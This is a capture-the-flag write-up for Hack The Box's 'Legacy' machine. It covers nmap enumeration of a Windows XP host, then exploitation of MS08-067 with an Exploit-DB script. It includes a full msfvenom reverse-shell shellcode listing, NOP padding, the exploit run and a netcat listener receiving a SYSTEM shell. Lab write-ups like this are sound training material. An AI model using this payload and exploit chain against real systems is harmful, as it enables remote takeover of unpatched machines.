Welcome to the Legacy writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k

Legacy

tags: HTB Easy Windows OSCP

Platform: Hackthebox

Difficult: Easy

S.O.: Windows

Link: Click here

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -Pn -T5 -p- 10.10.10.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-03 18:00 CEST
Nmap scan report for 10.10.10.4
Host is up (0.089s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 119.79 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 139,445,3389 10.10.10.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-03 18:02 CEST
Nmap scan report for 10.10.10.4
Host is up (0.086s latency).

PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000 (91%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows XP SP2 or Windows Small Business Server 2003 (91%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (91%), Microsoft Windows XP SP2 (91%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (90%), Microsoft Windows 2000 Server (89%), Microsoft Windows Server 2003 (89%), Microsoft Windows 2000 SP4 (89%), Microsoft Windows XP Professional SP3 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: -4h24m22s, deviation: 2h07m16s, median: -5h54m22s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:ef:ce (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2021-08-03T16:08:19+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   86.43 ms 10.10.14.1
2   86.41 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.37 seconds

After trying to extract information with rpcinfo and enum4linux without getting anything interesting, we are going to look for vulnerabilities with Nmap.

$ nmap -A -Pn -p 139,445,3389 10.10.10.4 --script vuln
[...]
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[...]

Searching the internet for the CVE-2008-4250 vulnerability we can find this exploit.

Exploitation

$ wget -O ms08_067_netapi.py https://www.exploit-db.com/download/40279

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.29 LPORT=8787  EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python | sed 's/buf /shellcode /g'
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of python file: 1700 bytes
shellcode =  b""
shellcode += b"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
shellcode += b"\x76\x0e\x92\xaa\xf9\x92\x83\xee\xfc\xe2\xf4\x6e\x42"
shellcode += b"\x7b\x92\x92\xaa\x99\x1b\x77\x9b\x39\xf6\x19\xfa\xc9"
shellcode += b"\x19\xc0\xa6\x72\xc0\x86\x21\x8b\xba\x9d\x1d\xb3\xb4"
shellcode += b"\xa3\x55\x55\xae\xf3\xd6\xfb\xbe\xb2\x6b\x36\x9f\x93"
shellcode += b"\x6d\x1b\x60\xc0\xfd\x72\xc0\x82\x21\xb3\xae\x19\xe6"
shellcode += b"\xe8\xea\x71\xe2\xf8\x43\xc3\x21\xa0\xb2\x93\x79\x72"
shellcode += b"\xdb\x8a\x49\xc3\xdb\x19\x9e\x72\x93\x44\x9b\x06\x3e"
shellcode += b"\x53\x65\xf4\x93\x55\x92\x19\xe7\x64\xa9\x84\x6a\xa9"
shellcode += b"\xd7\xdd\xe7\x76\xf2\x72\xca\xb6\xab\x2a\xf4\x19\xa6"
shellcode += b"\xb2\x19\xca\xb6\xf8\x41\x19\xae\x72\x93\x42\x23\xbd"
shellcode += b"\xb6\xb6\xf1\xa2\xf3\xcb\xf0\xa8\x6d\x72\xf5\xa6\xc8"
shellcode += b"\x19\xb8\x12\x1f\xcf\xc2\xca\xa0\x92\xaa\x91\xe5\xe1"
shellcode += b"\x98\xa6\xc6\xfa\xe6\x8e\xb4\x95\x55\x2c\x2a\x02\xab"
shellcode += b"\xf9\x92\xbb\x6e\xad\xc2\xfa\x83\x79\xf9\x92\x55\x2c"
shellcode += b"\xc2\xc2\xfa\xa9\xd2\xc2\xea\xa9\xfa\x78\xa5\x26\x72"
shellcode += b"\x6d\x7f\x6e\xf8\x97\xc2\xf3\x98\x9c\xb7\x91\x90\x92"
shellcode += b"\x88\xaa\x1b\x74\xc0\xe9\xc4\xc5\xc2\x60\x37\xe6\xcb"
shellcode += b"\x06\x47\x17\x6a\x8d\x9e\x6d\xe4\xf1\xe7\x7e\xc2\x09"
shellcode += b"\x27\x30\xfc\x06\x47\xfa\xc9\x94\xf6\x92\x23\x1a\xc5"
shellcode += b"\xc5\xfd\xc8\x64\xf8\xb8\xa0\xc4\x70\x57\x9f\x55\xd6"
shellcode += b"\x8e\xc5\x93\x93\x27\xbd\xb6\x82\x6c\xf9\xd6\xc6\xfa"
shellcode += b"\xaf\xc4\xc4\xec\xaf\xdc\xc4\xfc\xaa\xc4\xfa\xd3\x35"
shellcode += b"\xad\x14\x55\x2c\x1b\x72\xe4\xaf\xd4\x6d\x9a\x91\x9a"
shellcode += b"\x15\xb7\x99\x6d\x47\x11\x19\x8f\xb8\xa0\x91\x34\x07"
shellcode += b"\x17\x64\x6d\x47\x96\xff\xee\x98\x2a\x02\x72\xe7\xaf"
shellcode += b"\x42\xd5\x81\xd8\x96\xf8\x92\xf9\x06\x47"

In the exploit explanation, we read that we must generate 30 NOP for a 380 bytes payload, but our payload is 348 bytes then we will generate 62 NOP instead 30.

$ python -c'print "shellcode += b\""+"\\x90"*62+"\""'
shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

Now we put a terminal to listen and execute the exploit...

$ python ms08_067_netapi.py 10.10.10.4 7
#######################################################################
#   MS08-067 Exploit
#   This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#######################################################################

Windows XP SP3 English (AlwaysOn NX)

[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish

And we have shell!

$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.4] 1036
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

And now we can read the user and root flags.

C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
CENSORED_FLAG
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
CENSORED_FLAG